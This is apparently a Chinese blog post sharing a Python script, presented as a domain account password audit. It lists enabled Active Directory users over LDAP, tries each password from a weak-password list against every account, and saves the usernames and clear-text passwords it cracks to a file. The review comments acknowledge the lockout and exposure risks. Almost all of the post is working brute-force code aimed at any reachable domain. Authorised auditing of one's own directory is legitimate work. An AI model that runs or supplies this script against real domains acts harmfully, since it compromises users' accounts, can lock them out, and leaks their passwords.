域账户密码审计
刚学python,写得不太好。使用前先用vi配置下面几个参数,文章最后有下载地址
本地要放一个弱密码列表pwd.txt
server #ad的ip
domain #域名
username #域用户名
password #域用户的密码
base_dn #改下ou
#!/usr/bin/python
#coding=utf-8
import ldap
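# ---------------------------------------------------------------------------
# Audit configuration. Every value below is a sample; edit before running.
# ---------------------------------------------------------------------------

# Candidate weak passwords, one per line.
pass_file = "pwd.txt"

# Directory server (IP of the AD server) and the account used to enumerate
# users.
# NOTE(review): the bind password is stored here in clear text, so this file
# is itself a credential. Keep it out of shared directories and version
# control, or read the value at run time (e.g. with getpass) instead.
server = "10.1.10.2"
domain = "microsoft.com"
username = "user"
password = "password"

# Search settings for the user enumeration.
# `domain` and `base_dn` must describe the same directory; the sample values
# shown here do not match each other.
base_dn = "ou=users,dc=zy,dc=com"
scope = ldap.SCOPE_SUBTREE
# The filter is passed to search_s() and therefore has to be a string.
filters = "(objectCategory=user)"
# None requests every attribute of each entry; get_user() only reads
# sAMAccountName and userAccountControl.
attrs = None

# userAccountControl bit that marks an account as disabled.
ACCOUNTDISABLE = 2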
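def c_pwd(server, user, pwd):
    """Test one candidate password for one account with an LDAP simple bind.

    Parameters:
        server - IP of the AD server
        user   - account name to test, in the form accepted for a simple bind
        pwd    - candidate password for that account

    Return:
        1 - the bind succeeded, i.e. the password is valid
        0 - the server rejected the credentials, or pwd is empty

    Any other ldap.LDAPError (for example an unreachable server) propagates
    to the caller.
    """
    # A simple bind that carries a name but an empty password is an
    # "unauthenticated bind" (RFC 4513, section 5.1.2). A server may answer it
    # with success without checking anything, which would be reported as a
    # weak password for every account. Never send it.
    if not pwd:
        return 0

    # NOTE(review): with ldap:// the simple-bind password crosses the network
    # in clear text. Prefer ldaps:// or StartTLS where the server offers it.
    conn = ldap.initialize("ldap://" + server)
    try:
        conn.bind_s(user, pwd)
    except ldap.INVALID_CREDENTIALS:
        # NOTE(review): Active Directory is known to use this result for some
        # correct-password cases too (expired password, must change at next
        # logon), so 0 means "bind refused" rather than strictly "wrong
        # password" - confirm if that distinction matters for the audit.
        return 0
    else:
        return 1
    finally:
        # Release the connection on every path, including unexpected errors.
        conn.unbind_s()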
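def get_user(server, user, pwd):
    """Return the login names of the enabled accounts found under base_dn.

    Parameters:
        server - IP of the AD server
        user   - an ordinary account used to read the directory
        pwd    - password of that account

    Return: a list of sAMAccountName values. The list is empty when the bind
    or the search fails; the LDAP error is printed in that case.
    """
    entries = []
    conn = None
    try:
        conn = ldap.initialize("ldap://" + server)
        conn.bind_s(user, pwd)
        entries = conn.search_s(base_dn, scope, filters, attrs)
    except ldap.LDAPError as e:
        print(e)
    finally:
        # conn stays None only if initialize() itself failed.
        if conn is not None:
            conn.unbind_s()

    # Build a fresh local list so repeated calls do not accumulate results in
    # module-level state.
    names = []
    for entry in entries:
        attr_dict = entry[1]
        # Search results can contain referral entries whose second element is
        # a list of URLs rather than an attribute mapping; skip those.
        if not hasattr(attr_dict, "get"):
            continue
        uac = attr_dict.get("userAccountControl")
        login = attr_dict.get("sAMAccountName")
        # Objects matched by the filter that carry no account attributes
        # cannot be tested and are left out.
        if not uac or not login:
            continue
        if int(uac[0]) & ACCOUNTDISABLE:
            continue  # disabled account
        name = login[0]
        # Attribute values may arrive as bytes; callers concatenate the name
        # with text, so normalise it here.
        if not isinstance(name, str):
            name = name.decode("utf-8")
        names.append(name)
    return names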
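# Enumerate the enabled accounts, then try each candidate password against
# each account until one is accepted.
#
# NOTE(review): every rejected bind counts as a failed logon for the account
# under test. With N lines in pwd.txt an account can collect up to N failures
# in a row, which can trip the domain lockout policy for every enabled user
# under base_dn. The run is visible on the domain controllers as a burst of
# failed logons coming from this one host.

# Kept as a module-level list so the name exists before get_user() runs.
user_list = list()
user_list = get_user(server, username + "@" + domain, password)
try:
    with open(pass_file) as pwd_file:
        candidates = [line.rstrip() for line in pwd_file]
    # Blank lines would turn into empty-password binds, which a server may
    # accept without authenticating anyone; drop them.
    pwd_list = [candidate for candidate in candidates if candidate]

    # NOTE(review): cracked.txt (and the console output) hold account names
    # with their clear-text passwords. Restrict access to the file and remove
    # it once the affected passwords have been reset.
    with open("cracked.txt", "w") as cracked_file:
        for _user in user_list:
            user = _user + "@" + domain
            for pwd in pwd_list:
                if c_pwd(server, user, pwd):
                    print("cracked! username=" + user + ",password=" + pwd)
                    # One record per line; without the newline all findings
                    # run together in the report.
                    cracked_file.write("username=" + user + ",password=" + pwd + "\n")
                    break
    print('Cracked finished! You can get all cracked user in "cracked.txt"')
except IOError:
    print("open password file: failed!")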